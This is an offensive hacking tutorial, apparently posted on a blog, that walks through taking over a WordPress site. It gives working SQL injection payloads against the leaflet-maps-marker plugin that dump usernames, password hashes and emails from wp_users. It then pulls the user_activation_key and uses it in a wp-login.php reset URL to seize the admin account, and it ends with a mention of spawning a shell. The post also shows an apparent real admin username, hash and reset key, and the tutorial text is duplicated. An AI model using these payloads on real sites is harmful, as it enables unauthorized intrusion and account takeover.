How to hack Wordpress Website: A new way to inject site that use Wordpress Script
Hi Aman Is Here Once Again !
Today I'll show you How to inject site - word press - And enter to admin panel in Seconds .
lets say we have this vuln site :
and let's say We extracted column number and admin data [ user and passwors ] by sqli .
admin logo : michelsenweb
admin password : $P$BPXdeAk4qo6ndqQWUJfuRkMOCqi.bJ0
now this password is difficult to crack it
ok now i will show you Easy way to login into the admin panel
first we going to admin panel and press / Lost your password? \
![[Image: U3AEA.png]](https://i.imgur.com/U3AEA.png)
now we will put the admin user we found by injectin : michelsenweb .
![[Image: mSLvQ.png]](https://i.imgur.com/mSLvQ.png)
like this
![[Image: UOrwJ.png]](https://i.imgur.com/UOrwJ.png)
now we haven't the admin mail to receive a link to create a new password
or to get the activation key .
OK see what i will do !!!
now we will extracted user_activation_key by injection that we will use to grate new password
![[Image: TrMYL.png]](https://i.imgur.com/TrMYL.png)
now we have the user_activation_key to this admin user : michelsenweb
michelsenweb:ADpMtuhLWYbPSubvKwgx
now we will use this Query to grate new password
replace : user_activation_key by ADpMtuhLWYbPSubvKwgx
replace : user_login by michelsenweb .
like this
![[Image: WLpdv.png]](https://i.imgur.com/WLpdv.png)
now we get this page to grate now password after we Makes
now password press Reset password
![[Image: OjUVo.png]](https://i.imgur.com/OjUVo.png)
ok let's try to log into admin panel by our new password
![[Image: ANrW0.png]](https://i.imgur.com/ANrW0.png)
aha we now in admin panel and now we can spawned shell
Tutorial By Aman Kumar (Mr.H4ck3r)
Today I'll show you How to inject site - word press - And enter to admin panel in Seconds .
lets say we have this vuln site :
PHP Code:
www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=1 and let's say We extracted column number and admin data [ user and passwors ] by sqli .
PHP Code:
www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 Union Select 1,(select(@) from (select (@:=0x00),(select (@) from (wp_users) where (@) in (@:=concat(@,0x0a,user_login,0x3a,user_pass,0x3a,user_email))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 -- admin logo : michelsenweb
admin password : $P$BPXdeAk4qo6ndqQWUJfuRkMOCqi.bJ0
now this password is difficult to crack it
ok now i will show you Easy way to login into the admin panel
first we going to admin panel and press / Lost your password? \
PHP Code:
www.site.com/wp-login.php now we will put the admin user we found by injectin : michelsenweb .
like this
now we haven't the admin mail to receive a link to create a new password
or to get the activation key .
OK see what i will do !!!
now we will extracted user_activation_key by injection that we will use to grate new password
PHP Code:
www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 UNION SELECT 1,2,3,4,5,group_concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM wp_users now we have the user_activation_key to this admin user : michelsenweb
michelsenweb:ADpMtuhLWYbPSubvKwgx
now we will use this Query to grate new password
PHP Code:
www.site.com/wp-login.php?action=rp&key=user_activation_key&login=user_login replace : user_activation_key by ADpMtuhLWYbPSubvKwgx
replace : user_login by michelsenweb .
like this
PHP Code:
www.site.com/wp-login.php?action=rp&key=ADpMtuhLWYbPSubvKwgx&login=michelsenweb
Spoiler (Click to Hide)
now we get this page to grate now password after we Makes
now password press Reset password
ok let's try to log into admin panel by our new password
aha we now in admin panel and now we can spawned shell
Tutorial By Aman Kumar (Mr.H4ck3r)
No comments:
Post a Comment